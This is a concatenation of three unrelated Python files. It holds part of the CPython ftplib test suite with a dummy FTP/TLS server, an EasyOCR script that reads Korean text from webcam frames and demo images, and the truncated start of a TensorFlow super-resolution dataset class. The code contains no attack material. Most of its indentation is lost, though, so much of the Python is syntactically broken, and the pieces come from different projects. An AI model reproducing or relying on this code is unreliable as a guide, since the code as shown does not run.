self.dtp.close_when_done()
def cmd_nlst(self, arg):
self.push('125 nlst ok')
self.dtp.push(NLST_DATA)
self.dtp.close_when_done()
def cmd_opts(self, arg):
self.push('200 opts ok')
def cmd_mlsd(self, arg):
self.push('125 mlsd ok')
self.dtp.push(MLSD_DATA)
self.dtp.close_when_done()
def cmd_setlongretr(self, arg):
# For testing. Next RETR will return long line.
self.next_retr_data = 'x' * int(arg)
self.push('125 setlongretr ok')
class DummyFTPServer(asyncore.dispatcher, threading.Thread):
handler = DummyFTPHandler
def __init__(self, address, af=socket.AF_INET):
threading.Thread.__init__(self)
asyncore.dispatcher.__init__(self)
self.create_socket(af, socket.SOCK_STREAM)
self.bind(address)
self.listen(5)
self.active = False
self.active_lock = threading.Lock()
self.host, self.port = self.socket.getsockname()[:2]
self.handler_instance = None
def start(self):
assert not self.active
self.__flag = threading.Event()
threading.Thread.start(self)
self.__flag.wait()
def run(self):
self.active = True
self.__flag.set()
while self.active and asyncore.socket_map:
self.active_lock.acquire()
asyncore.loop(timeout=0.1, count=1)
self.active_lock.release()
asyncore.close_all(ignore_all=True)
def stop(self):
assert self.active
self.active = False
self.join()
def handle_accepted(self, conn, addr):
self.handler_instance = self.handler(conn)
def handle_connect(self):
self.close()
handle_read = handle_connect
def writable(self):
return 0
def handle_error(self):
raise
if ssl is not None:
CERTFILE = os.path.join(os.path.dirname(__file__), "keycert.pem")
class SSLConnection(asyncore.dispatcher):
"""An asyncore.dispatcher subclass supporting TLS/SSL."""
_ssl_accepting = False
_ssl_closing = False
def secure_connection(self):
socket = ssl.wrap_socket(self.socket, suppress_ragged_eofs=False,
certfile=CERTFILE, server_side=True,
do_handshake_on_connect=False,
ssl_version=ssl.PROTOCOL_SSLv23)
self.del_channel()
self.set_socket(socket)
self._ssl_accepting = True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
elif err.args[0] == ssl.SSL_ERROR_EOF:
return self.handle_close()
raise
except socket.error as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def _do_ssl_shutdown(self):
self._ssl_closing = True
try:
self.socket = self.socket.unwrap()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
except socket.error as err:
# Any "socket error" corresponds to a SSL_ERROR_SYSCALL return
# from OpenSSL's SSL_shutdown(), corresponding to a
# closed socket condition. See also:
# http://www.mail-archive.com/openssl-users@openssl.org/msg60710.html
pass
self._ssl_closing = False
            if getattr(self, '_ccc', False) is False:
                super(SSLConnection, self).close()
def handle_read_event(self):
if self._ssl_accepting:
self._do_ssl_handshake()
elif self._ssl_closing:
self._do_ssl_shutdown()
else:
super(SSLConnection, self).handle_read_event()
def handle_write_event(self):
if self._ssl_accepting:
self._do_ssl_handshake()
elif self._ssl_closing:
self._do_ssl_shutdown()
else:
super(SSLConnection, self).handle_write_event()
def send(self, data):
try:
return super(SSLConnection, self).send(data)
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN,
ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return 0
raise
def recv(self, buffer_size):
try:
return super(SSLConnection, self).recv(buffer_size)
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return b''
if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN):
self.handle_close()
return b''
raise
def handle_error(self):
raise
def close(self):
if (isinstance(self.socket, ssl.SSLSocket) and
self.socket._sslobj is not None):
self._do_ssl_shutdown()
else:
super(SSLConnection, self).close()
class DummyTLS_DTPHandler(SSLConnection, DummyDTPHandler):
"""A DummyDTPHandler subclass supporting TLS/SSL."""
def __init__(self, conn, baseclass):
DummyDTPHandler.__init__(self, conn, baseclass)
if self.baseclass.secure_data_channel:
self.secure_connection()
class DummyTLS_FTPHandler(SSLConnection, DummyFTPHandler):
"""A DummyFTPHandler subclass supporting TLS/SSL."""
dtp_handler = DummyTLS_DTPHandler
def __init__(self, conn):
DummyFTPHandler.__init__(self, conn)
self.secure_data_channel = False
self._ccc = False
def cmd_auth(self, line):
"""Set up secure control channel."""
self.push('234 AUTH TLS successful')
self.secure_connection()
def cmd_ccc(self, line):
self.push('220 Reverting back to clear-text')
self._ccc = True
self._do_ssl_shutdown()
def cmd_pbsz(self, line):
"""Negotiate size of buffer for secure data transfer.
For TLS/SSL the only valid value for the parameter is '0'.
Any other value is accepted but ignored.
"""
self.push('200 PBSZ=0 successful.')
def cmd_prot(self, line):
"""Setup un/secure data channel."""
arg = line.upper()
if arg == 'C':
self.push('200 Protection set to Clear')
self.secure_data_channel = False
elif arg == 'P':
self.push('200 Protection set to Private')
self.secure_data_channel = True
else:
self.push("502 Unrecognized PROT type (use C or P).")
class DummyTLS_FTPServer(DummyFTPServer):
handler = DummyTLS_FTPHandler
class TestFTPClass(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP(timeout=2)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def check_data(self, received, expected):
self.assertEqual(len(received), len(expected))
self.assertEqual(received, expected)
def test_getwelcome(self):
self.assertEqual(self.client.getwelcome(), '220 welcome')
def test_sanitize(self):
self.assertEqual(self.client.sanitize('foo'), repr('foo'))
self.assertEqual(self.client.sanitize('pass 12345'), repr('pass *****'))
self.assertEqual(self.client.sanitize('PASS 12345'), repr('PASS *****'))
def test_exceptions(self):
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 400')
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 499')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 500')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 599')
self.assertRaises(ftplib.error_proto, self.client.sendcmd, 'echo 999')
def test_all_errors(self):
exceptions = (ftplib.error_reply, ftplib.error_temp, ftplib.error_perm,
ftplib.error_proto, ftplib.Error, IOError, EOFError)
for x in exceptions:
try:
raise x('exception not included in all_errors set')
except ftplib.all_errors:
pass
def test_set_pasv(self):
# passive mode is supposed to be enabled by default
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(True)
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(False)
self.assertFalse(self.client.passiveserver)
def test_voidcmd(self):
self.client.voidcmd('echo 200')
self.client.voidcmd('echo 299')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 199')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 300')
def test_login(self):
self.client.login()
def test_acct(self):
self.client.acct('passwd')
def test_rename(self):
self.client.rename('a', 'b')
self.server.handler_instance.next_response = '200'
self.assertRaises(ftplib.error_reply, self.client.rename, 'a', 'b')
def test_delete(self):
self.client.delete('foo')
self.server.handler_instance.next_response = '199'
self.assertRaises(ftplib.error_reply, self.client.delete, 'foo')
def test_size(self):
self.client.size('foo')
def test_mkd(self):
dir = self.client.mkd('/foo')
self.assertEqual(dir, '/foo')
def test_rmd(self):
self.client.rmd('foo')
def test_cwd(self):
dir = self.client.cwd('/foo')
self.assertEqual(dir, '250 cwd ok')
def test_pwd(self):
dir = self.client.pwd()
self.assertEqual(dir, 'pwd ok')
def test_quit(self):
self.assertEqual(self.client.quit(), '221 quit ok')
# Ensure the connection gets closed; sock attribute should be None
self.assertEqual(self.client.sock, None)
def test_abort(self):
self.client.abort()
def test_retrbinary(self):
def callback(data):
received.append(data.decode('ascii'))
received = []
self.client.retrbinary('retr', callback)
self.check_data(''.join(received), RETR_DATA)
def test_retrbinary_rest(self):
def callback(data):
received.append(data.decode('ascii'))
for rest in (0, 10, 20):
received = []
self.client.retrbinary('retr', callback, rest=rest)
self.check_data(''.join(received), RETR_DATA[rest:])
def test_retrlines(self):
received = []
self.client.retrlines('retr', received.append)
self.check_data(''.join(received), RETR_DATA.replace('\r\n', ''))
def test_storbinary(self):
f = io.BytesIO(RETR_DATA.encode('ascii'))
self.client.storbinary('stor', f)
self.check_data(self.server.handler_instance.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storbinary('stor', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
def test_storbinary_rest(self):
f = io.BytesIO(RETR_DATA.replace('\r\n', '\n').encode('ascii'))
for r in (30, '30'):
f.seek(0)
self.client.storbinary('stor', f, rest=r)
self.assertEqual(self.server.handler_instance.rest, str(r))
def test_storlines(self):
f = io.BytesIO(RETR_DATA.replace('\r\n', '\n').encode('ascii'))
self.client.storlines('stor', f)
self.check_data(self.server.handler_instance.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storlines('stor foo', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
f = io.StringIO(RETR_DATA.replace('\r\n', '\n'))
# storlines() expects a binary file, not a text file
with support.check_warnings(('', BytesWarning), quiet=True):
self.assertRaises(TypeError, self.client.storlines, 'stor foo', f)
def test_nlst(self):
self.client.nlst()
self.assertEqual(self.client.nlst(), NLST_DATA.split('\r\n')[:-1])
def test_dir(self):
l = []
self.client.dir(lambda x: l.append(x))
self.assertEqual(''.join(l), LIST_DATA.replace('\r\n', ''))
def test_mlsd(self):
list(self.client.mlsd())
list(self.client.mlsd(path='/'))
list(self.client.mlsd(path='/', facts=['size', 'type']))
ls = list(self.client.mlsd())
for name, facts in ls:
self.assertIsInstance(name, str)
self.assertIsInstance(facts, dict)
self.assertTrue(name)
self.assertIn('type', facts)
self.assertIn('perm', facts)
self.assertIn('unique', facts)
def set_data(data):
self.server.handler_instance.next_data = data
def test_entry(line, type=None, perm=None, unique=None, name=None):
type = 'type' if type is None else type
perm = 'perm' if perm is None else perm
unique = 'unique' if unique is None else unique
name = 'name' if name is None else name
set_data(line)
_name, facts = next(self.client.mlsd())
self.assertEqual(_name, name)
self.assertEqual(facts['type'], type)
self.assertEqual(facts['perm'], perm)
self.assertEqual(facts['unique'], unique)
# plain
test_entry('type=type;perm=perm;unique=unique; name\r\n')
# "=" in fact value
test_entry('type=ty=pe;perm=perm;unique=unique; name\r\n', type="ty=pe")
test_entry('type==type;perm=perm;unique=unique; name\r\n', type="=type")
test_entry('type=t=y=pe;perm=perm;unique=unique; name\r\n', type="t=y=pe")
test_entry('type=====;perm=perm;unique=unique; name\r\n', type="====")
# spaces in name
test_entry('type=type;perm=perm;unique=unique; na me\r\n', name="na me")
test_entry('type=type;perm=perm;unique=unique; name \r\n', name="name ")
test_entry('type=type;perm=perm;unique=unique; name\r\n', name=" name")
test_entry('type=type;perm=perm;unique=unique; n am e\r\n', name="n am e")
# ";" in name
test_entry('type=type;perm=perm;unique=unique; na;me\r\n', name="na;me")
test_entry('type=type;perm=perm;unique=unique; ;name\r\n', name=";name")
test_entry('type=type;perm=perm;unique=unique; ;name;\r\n', name=";name;")
test_entry('type=type;perm=perm;unique=unique; ;;;;\r\n', name=";;;;")
        # case sensitivity
set_data('Type=type;TyPe=perm;UNIQUE=unique; name\r\n')
_name, facts = next(self.client.mlsd())
for x in facts:
self.assertTrue(x.islower())
# no data (directory empty)
set_data('')
self.assertRaises(StopIteration, next, self.client.mlsd())
set_data('')
for x in self.client.mlsd():
            self.fail("unexpected data %s" % x)
def test_makeport(self):
with self.client.makeport():
# IPv4 is in use, just make sure send_eprt has not been used
self.assertEqual(self.server.handler_instance.last_received_cmd,
'port')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), 10)
conn.close()
# IPv4 is in use, just make sure send_epsv has not been used
self.assertEqual(self.server.handler_instance.last_received_cmd, 'pasv')
def test_with_statement(self):
self.client.quit()
def is_client_connected():
if self.client.sock is None:
return False
try:
self.client.sendcmd('noop')
except (socket.error, EOFError):
return False
return True
# base test
with ftplib.FTP(timeout=2) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.assertTrue(is_client_connected())
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
# QUIT sent inside the with block
with ftplib.FTP(timeout=2) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.client.quit()
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
# force a wrong response code to be sent on QUIT: error_perm
# is expected and the connection is supposed to be closed
try:
with ftplib.FTP(timeout=2) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.server.handler_instance.next_response = '550 error on quit'
except ftplib.error_perm as err:
self.assertEqual(str(err), '550 error on quit')
else:
self.fail('Exception not raised')
# needed to give the threaded server some time to set the attribute
# which otherwise would still be == 'noop'
time.sleep(0.1)
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
def test_source_address(self):
self.client.quit()
port = support.find_unused_port()
try:
self.client.connect(self.server.host, self.server.port,
source_address=(HOST, port))
self.assertEqual(self.client.sock.getsockname()[1], port)
self.client.quit()
except IOError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to port %d" % port)
raise
def test_source_address_passive_connection(self):
port = support.find_unused_port()
self.client.source_address = (HOST, port)
try:
with self.client.transfercmd('list') as sock:
self.assertEqual(sock.getsockname()[1], port)
except IOError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to port %d" % port)
raise
def test_parse257(self):
self.assertEqual(ftplib.parse257('257 "/foo/bar"'), '/foo/bar')
self.assertEqual(ftplib.parse257('257 "/foo/bar" created'), '/foo/bar')
self.assertEqual(ftplib.parse257('257 ""'), '')
self.assertEqual(ftplib.parse257('257 "" created'), '')
self.assertRaises(ftplib.error_reply, ftplib.parse257, '250 "/foo/bar"')
        # The 257 response is supposed to include the directory
        # name and, if it contains embedded double-quotes, they
        # must be doubled (see RFC-959, chapter 7, appendix 2).
self.assertEqual(ftplib.parse257('257 "/foo/b""ar"'), '/foo/b"ar')
self.assertEqual(ftplib.parse257('257 "/foo/b""ar" created'), '/foo/b"ar')
def test_line_too_long(self):
self.assertRaises(ftplib.Error, self.client.sendcmd,
'x' * self.client.maxline * 2)
def test_retrlines_too_long(self):
self.client.sendcmd('SETLONGRETR %d' % (self.client.maxline * 2))
received = []
self.assertRaises(ftplib.Error,
self.client.retrlines, 'retr', received.append)
def test_storlines_too_long(self):
f = io.BytesIO(b'x' * self.client.maxline * 2)
self.assertRaises(ftplib.Error, self.client.storlines, 'stor', f)
@skipUnless(support.IPV6_ENABLED, "IPv6 not enabled")
class TestIPv6Environment(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOSTv6, 0), af=socket.AF_INET6)
self.server.start()
self.client = ftplib.FTP()
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_af(self):
self.assertEqual(self.client.af, socket.AF_INET6)
def test_makeport(self):
with self.client.makeport():
self.assertEqual(self.server.handler_instance.last_received_cmd,
'eprt')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), 10)
conn.close()
self.assertEqual(self.server.handler_instance.last_received_cmd, 'epsv')
def test_transfer(self):
def retr():
def callback(data):
received.append(data.decode('ascii'))
received = []
self.client.retrbinary('retr', callback)
self.assertEqual(len(''.join(received)), len(RETR_DATA))
self.assertEqual(''.join(received), RETR_DATA)
self.client.set_pasv(True)
retr()
self.client.set_pasv(False)
retr()
@skipUnless(ssl, "SSL not available")
class TestTLS_FTPClassMixin(TestFTPClass):
"""Repeat TestFTPClass tests starting the TLS layer for both control
and data connections first.
"""
def setUp(self):
self.server = DummyTLS_FTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP_TLS(timeout=2)
self.client.connect(self.server.host, self.server.port)
# enable TLS
self.client.auth()
self.client.prot_p()
@skipUnless(ssl, "SSL not available")
class TestTLS_FTPClass(TestCase):
"""Specific TLS_FTP class tests."""
def setUp(self):
self.server = DummyTLS_FTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP_TLS(timeout=2)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_control_connection(self):
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.auth()
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
def test_data_connection(self):
# clear text
with self.client.transfercmd('list') as sock:
self.assertNotIsInstance(sock, ssl.SSLSocket)
self.assertEqual(self.client.voidresp(), "226 transfer complete")
# secured, after PROT P
self.client.prot_p()
with self.client.transfercmd('list') as sock:
self.assertIsInstance(sock, ssl.SSLSocket)
self.assertEqual(self.client.voidresp(), "226 transfer complete")
# PROT C is issued, the connection must be in cleartext again
self.client.prot_c()
with self.client.transfercmd('list') as sock:
self.assertNotIsInstance(sock, ssl.SSLSocket)
self.assertEqual(self.client.voidresp(), "226 transfer complete")
def test_login(self):
# login() is supposed to implicitly secure the control connection
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.login()
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
# make sure that AUTH TLS doesn't get issued again
self.client.login()
def test_auth_issued_twice(self):
self.client.auth()
self.assertRaises(ValueError, self.client.auth)
def test_auth_ssl(self):
try:
self.client.ssl_version = ssl.PROTOCOL_SSLv3
self.client.auth()
self.assertRaises(ValueError, self.client.auth)
finally:
self.client.ssl_version = ssl.PROTOCOL_TLSv1
def test_context(self):
self.client.quit()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(ValueError, ftplib.FTP_TLS, keyfile=CERTFILE,
context=ctx)
self.assertRaises(ValueError, ftplib.FTP_TLS, certfile=CERTFILE,
context=ctx)
self.assertRaises(ValueError, ftplib.FTP_TLS, certfile=CERTFILE,
keyfile=CERTFILE, context=ctx)
self.client = ftplib.FTP_TLS(context=ctx, timeout=2)
self.client.connect(self.server.host, self.server.port)
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.auth()
self.assertIs(self.client.sock.context, ctx)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.client.prot_p()
with self.client.transfercmd('list') as sock:
self.assertIs(sock.context, ctx)
self.assertIsInstance(sock, ssl.SSLSocket)
def test_ccc(self):
self.assertRaises(ValueError, self.client.ccc)
self.client.login(secure=True)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.client.ccc()
self.assertRaises(ValueError, self.client.sock.unwrap)
class TestTimeouts(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(20)
self.port = support.bind_port(self.sock)
self.server_thread = threading.Thread(target=self.server)
self.server_thread.start()
# Wait for the server to be ready.
self.evt.wait()
self.evt.clear()
self.old_port = ftplib.FTP.port
ftplib.FTP.port = self.port
def tearDown(self):
ftplib.FTP.port = self.old_port
self.server_thread.join()
def server(self):
# This method sets the evt 3 times:
# 1) when the connection is ready to be accepted.
# 2) when it is safe for the caller to close the connection
# 3) when we have closed the socket
self.sock.listen(5)
# (1) Signal the caller that we are ready to accept the connection.
self.evt.set()
try:
conn, addr = self.sock.accept()
except socket.timeout:
pass
else:
conn.sendall(b"1 Hola mundo\n")
conn.shutdown(socket.SHUT_WR)
# (2) Signal the caller that it is safe to close the socket.
self.evt.set()
conn.close()
finally:
self.sock.close()
def testTimeoutDefault(self):
# default -- use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP(HOST)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutNone(self):
# no timeout -- do not use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP(HOST, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(ftp.sock.gettimeout())
self.evt.wait()
ftp.close()
def testTimeoutValue(self):
# a value
ftp = ftplib.FTP(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutConnect(self):
ftp = ftplib.FTP()
ftp.connect(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDifferentOrder(self):
ftp = ftplib.FTP(timeout=30)
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDirectAccess(self):
ftp = ftplib.FTP()
ftp.timeout = 30
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def test_main():
tests = [TestFTPClass, TestTimeouts,
TestIPv6Environment,
TestTLS_FTPClassMixin, TestTLS_FTPClass]
thread_info = support.threading_setup()
try:
support.run_unittest(*tests)
finally:
support.threading_cleanup(*thread_info)
if __name__ == '__main__':
test_main()
|
run.py
|
import cv2 as cv
import numpy as np
from easyocr.easyocr import *
from PIL import ImageFont, ImageDraw, Image
from video_processing_parallel import WebcamStream
import os
import time
from threading import Thread # library for implementing multi-threaded processing
# GPU configuration
os.environ['CUDA_VISIBLE_DEVICES'] = '0,1'
def get_files(path):
file_list = []
lists = [f for f in os.listdir(path) if not f.startswith('.')] # skip hidden file
lists.sort()
abspath = os.path.abspath(path)
for onelist in lists:
file_path = os.path.join(abspath, onelist)
file_list.append(file_path)
return file_list, len(file_list)
def put_test(img, str_text, filename):
    # cv.putText cannot render Korean (Hangul) text, so the text is drawn with PIL instead
# font = cv.FONT_HERSHEY_SIMPLEX
# bottomLeftCornerOfText = (10, 500)
# fontScale = 1
# fontColor = (0, 0, 255)
# thickness = 1
# lineType = 2
#
# cv.putText(img, str_text,
# bottomLeftCornerOfText,
# font,
# fontScale,
# fontColor,
# thickness,
# lineType)
bottomLeftCornerOfText = (10, 500)
font = ImageFont.truetype("fonts/gulim.ttc", 20)
    ##text_img = np.full((200,300,3), (0, 0, 255), np.uint8)
img = Image.fromarray(img)
draw = ImageDraw.Draw(img)
draw.text(bottomLeftCornerOfText, str_text, font=font, fill=(0,0,0))
img = np.array(img)
cv.imshow(filename, img)
def get_text(img_color):
result = reader.readtext(img_color)
print("result.__len__():", result.__len__())
if result.__len__() > 0:
# ./easyocr/utils.py 733 lines
# result[0]: bbox
# result[1]: string
# result[2]: confidence
for idx, (bbox, string, confidence) in enumerate(result):
print("confidence: %.4f, string: '%s'" % (confidence, string))
# print('bbox: ', bbox)
if True:
cv.rectangle(img_color, (int(bbox[0][0]), int(bbox[0][1])), (int(bbox[2][0]), int(bbox[2][1])), (0, 0, 255),
3)
# put_test(img, string, filename)
bottomLeftCornerOfText = (int(bbox[0][0]), int(bbox[0][1]) - 30)
# font = ImageFont.truetype("fonts/gulim.ttc", 20)
                ##text_img = np.full((200,300,3), (0, 0, 255), np.uint8)
img_color = Image.fromarray(img_color)
draw = ImageDraw.Draw(img_color)
w, h = font.getsize(string)
draw.rectangle((int(bbox[0][0]), int(bbox[0][1]) - 30, int(bbox[0][0]) + w, int(bbox[0][1]) - 30 + h),
fill='gray')
draw.text(bottomLeftCornerOfText, string, font=font, fill=(0, 255, 255))
img_color = np.array(img_color)
if idx == 4:
cv.imshow("test", img_color)
cv.waitKey(0)
cv.destroyWindow("test")
if __name__ == '__main__':
if False:
# cap = cv.VideoCapture(0)
webcam_stream = WebcamStream(stream_id=0) # stream_id = 0 is for primary camera
webcam_stream.start()
reader = Reader(['ko', 'en'], gpu=False,
model_storage_directory='./model',
user_network_directory='./user_network',
# recog_network='TPS-ResNet-BiLSTM-CTC-0311-wild')
# # recog_network='TPS-ResNet-BiLSTM-Attn-0316-wild')
recog_network='TPS-ResNet-BiLSTM-Attn-wild-syllable-0317')
# recog_network='TPS-ResNet-BiLSTM-CTC-syllable-word-0316')
font = ImageFont.truetype("fonts/gulim.ttc", 30)
while(True):
# ret, img_color = cap.read()
img_color = webcam_stream.read()
height, width = img_color.shape[:2]
img_color = cv.resize(img_color, (width, height), interpolation=cv.INTER_AREA)
            # img_color = cv.flip(img_color, 1)  # horizontal flip (mirror left-right)
            delay = 0.03  # frame delay in seconds (e.g. delay=1 pauses one second per iteration)
# delay = 2
time.sleep(delay)
# cv.imshow("test", img_color)
# t = Thread(target=get_text, args=(img_color,))
# t.start()
key = cv.waitKey(1)
if key == ord('s'):
get_text(img_color)
# in thread
# t = Thread(target=get_text, args=(img_color,))
# t.start()
"""
result = reader.readtext(img_color)
print("result.__len__():", result.__len__())
if result.__len__() > 0:
# ./easyocr/utils.py 733 lines
# result[0]: bbox
# result[1]: string
# result[2]: confidence
for (bbox, string, confidence) in result:
print("confidence: %.4f, string: '%s'" % (confidence, string))
# print('bbox: ', bbox)
cv.rectangle(img_color, (int(bbox[0][0]), int(bbox[0][1])), (int(bbox[2][0]), int(bbox[2][1])), (0, 0, 255),3)
# put_test(img, string, filename)
bottomLeftCornerOfText = (int(bbox[0][0]), int(bbox[0][1])-30)
# font = ImageFont.truetype("fonts/gulim.ttc", 20)
            ##text_img = np.full((200,300,3), (0, 0, 255), np.uint8)
img_color = Image.fromarray(img_color)
draw = ImageDraw.Draw(img_color)
w, h = font.getsize(string)
draw.rectangle((int(bbox[0][0]), int(bbox[0][1])-30, int(bbox[0][0]) + w, int(bbox[0][1])-30 + h), fill='gray')
draw.text(bottomLeftCornerOfText, string, font=font, fill=(0, 255, 255))
img_color = np.array(img_color)
cv.imshow("test", img_color)
cv.waitKey(0)
cv.destroyWindow("test")
"""
# cv.waitKey(0)
            # quit when the ESC key is pressed
elif key == 27:
cv.destroyWindow("test")
break
else:
cv.imshow("test", img_color)
continue
webcam_stream.stop()
cv.destroyAllWindows()
else :
# # Using default model
# reader = Reader(['en'], gpu=True)
# Using custom model case english
# reader = Reader(['en'], gpu=False,
# model_storage_directory='model',
# user_network_directory='user_network',
# recog_network='custom_en')
# Using custom model case english
# reader = Reader(['ko','en'], gpu=False,
# model_storage_directory='model',
# user_network_directory='user_network',
# recog_network='custom_ko')
# try:
reader = Reader(['ko'], gpu=False,
model_storage_directory='../trainning_model/None-VGG-BiLSTM-CTC-Seed334',
# model_storage_directory='./model',
# model_storage_directory='../trainning_model',
user_network_directory='./user_network',
recog_network='best_accuracy')
# files, count = get_files('../TextRecognitionDataGenerator/out') #orig 'examples'
# files, count = get_files('examples') # orig
files, count = get_files('demo_image')
n_sucess = 0
n_fail = 0
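        # The accuracy check below assumes each demo image is named
        # '<label>_<suffix>.<ext>' (e.g. 'label_001.png', an assumed convention
        # inferred from filename.split('_')[0]), so the ground-truth text is the
        # part of the file name before the first underscore.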
for idx, file in enumerate(files):
filename = os.path.basename(file)
# print("file:", file )
result = reader.readtext(file, min_size=10)
time.sleep(0.2)
# ./easyocr/utils.py 733 lines
# result[0]: bbox
# result[1]: string
# result[2]: confidence
# print(result)
if result:
for (bbox, string, confidence) in result:
if filename.split('_')[0] == string:
print("[TRUE]idx: %d, filename: '%s', string: '%s', confidence: %.4f" % (idx, filename, string, confidence))
n_sucess += 1
else:
print("\t\t\t\t\t\t\t\t\t\t\t\t\t\t[FALSE]idx: %d, filename: '%s', string: '%s'" % (idx, filename, string))
n_fail += 1
print("Success Count:%d, Failure Count:%d" % (n_sucess, n_fail))
print("Success Count:%d, Failure Count:%d" % (n_sucess, n_fail))
"""
img = cv.imread(file)
for (bbox, string, confidence) in result:
if filename.split('_')[0] == string:
print("idx: %d, filename: '%s', confidence: %.4f, string: '%s', bbox: '%s'" % (idx, filename, confidence, string, bbox))
else:
print("idx: %d", idx)
# print('bbox: ', bbox)
# img = cv.imread(file)
cv.rectangle(img, (int(bbox[0][0]), int(bbox[0][1])), (int(bbox[2][0]), int(bbox[2][1])), (255, 255, 0), 3)
# put_test(img, string, filename)
# bottomLeftCornerOfText = (10, 500)
bottomLeftCornerOfText = (int(bbox[0][0]), int(bbox[0][1]) - 5)
font = ImageFont.truetype("fonts/gulim.ttc", 15)
            ##text_img = np.full((200,300,3), (0, 0, 255), np.uint8)
img = Image.fromarray(img)
draw = ImageDraw.Draw(img)
w, h = font.getsize(string)
draw.rectangle((int(bbox[0][0]), int(bbox[0][1]) - 5, int(bbox[0][0]) + w, int(bbox[0][1]) - 5 + h), fill='black')
draw.text(bottomLeftCornerOfText, string, font=font, fill=(0, 0, 255))
img = np.array(img)
cv.imshow(filename, img)
cv.waitKey(0)
cv.destroyAllWindows()
"""
        # except Exception as e:  # catch Exception to print the error message for any exception
        #     print('An exception occurred.', e)
|
dataset.py
|
import os
import tensorflow as tf
import numpy as np
from PIL import Image
import time
import threading
class Dataset(object):
def __init__(self, args):
self.train_directory = args.train_directory
self.validation_directory = args.validation_directory
self.batch_size = args.batch_size
self.train_list = os.listdir(self.train_directory)
self.test_list = os.listdir(self.validation_directory)
assert len(self.train_list) > 0 and len(self.test_list) > 0, 'Empty dataset'
self.test_i = 0
self.patch_size = args.patch_size # HR patch size
self.queue_size = 256
self.make_queue()
def make_queue(self):
image_shape_hr = (self.patch_size, self.patch_size, 3)
image_shape_lr = (self.patch_size//2, self.patch_size//2, 3)
image_shape_lr_ = (self.patch_size//4, self.patch_size//4, 3)
self.maml_img_lr = tf.placeholder(tf.float32, (None,) + image_shape_lr)
self.maml_img_bicubic = tf.placeholder(tf.float32, (None,) + image_shape_hr)
self.maml_img_hr = tf.placeholder(tf.float32, (None,) + image_shape_hr)
self.img_lr = tf.placeholder(tf.float32, (None,) + image_shape_lr_)
self.img_bicubic = tf.placeholder(tf.float32, (None,) + image_shape_lr)
